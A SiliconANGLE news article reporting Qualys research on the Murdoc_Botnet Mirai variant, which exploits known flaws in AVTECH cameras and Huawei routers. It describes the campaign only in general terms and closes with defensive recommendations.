SECURITY
SECURITY
SECURITY
New Mirai variant ‘Murdoc_Botnet’ targets AVTECH cameras and Huawei routers
Researchers at cybersecurity software provider Qualys Inc. are warning of a new Mirai botnet variant that’s being used to target vulnerabilities in AVTECH Cameras and Huawei HG523 routers.
The variant, dubbed “Murdoc_Botnet,” was first detected in July and has already been found to have affected at least 1,300 devices globally, especially in Malaysia, Thailand, Mexico and Indonesia. Like all Mirai variants, the idea is to infect as many devices as possible to create new, extensive botnet networks.
The Qualys researchers found that Murdoc_Botnet employs a combination of ELF files and shell scripts to infiltrate devices. The scripts exploit vulnerabilities, such as CVE-2024-7029 and CVE-2017-17215, to deploy malware payloads and establish persistent connections with command-and-control servers.
The campaign’s infrastructure includes over 100 distinct command and control servers, with each responsible for managing and propagating malware to compromised devices. The servers communicate with infected devices to orchestrate activities such as payload execution, further infection and botnet expansion.
The Murdoc_Botnet favors internet of things devices, particularly targeting AVTECH cameras and Huawei routers. It targets those devices, knowing that they have existing vulnerabilities that are unlikely to be patched, ensuring a steady stream of new victims to enhance its network.
The malware spreads by executing bash scripts that fetch and execute payloads. The scripts are also designed to remove traces of their activity post-execution, making it harder for security tools to detect and mitigate the threat.
The Qualys researchers recommend that enterprise users and administrators make efforts to identify and protect against such attacks.
Recommended action includes regularly monitoring for suspicious processes, events and network traffic spawned by the execution of any untrusted binaries and scripts. Administrators and users should always be cautious in executing shell scripts from unknown or untrusted sources and admins should keep systems and firmware updated with the latest releases and patches.
Image: SiliconANGLE/Ideogram
A message from John Furrier, co-founder of SiliconANGLE:
Support our mission to keep content open and free by engaging with theCUBE community. Join theCUBE’s Alumni Trust Network, where technology leaders connect, share intelligence and create opportunities.
- 15M+ viewers of theCUBE videos, powering conversations across AI, cloud, cybersecurity and more
- 11.4k+ theCUBE alumni — Connect with more than 11,400 tech and business leaders shaping the future through a unique trusted-based network.
About SiliconANGLE Media
SiliconANGLE Media is a recognized leader in digital media innovation, uniting breakthrough technology, strategic insights and real-time audience engagement. As the parent company of SiliconANGLE, theCUBE Network, theCUBE Research, CUBE365, theCUBE AI and theCUBE SuperStudios — with flagship locations in Silicon Valley and the New York Stock Exchange — SiliconANGLE Media operates at the intersection of media, technology and AI.
Founded by tech visionaries John Furrier and Dave Vellante, SiliconANGLE Media has built a dynamic ecosystem of industry-leading digital media brands that reach 15+ million elite tech professionals. Our new proprietary theCUBE AI Video Cloud is breaking ground in audience interaction, leveraging theCUBEai.com neural network to help technology companies make data-driven decisions and stay at the forefront of industry conversations.
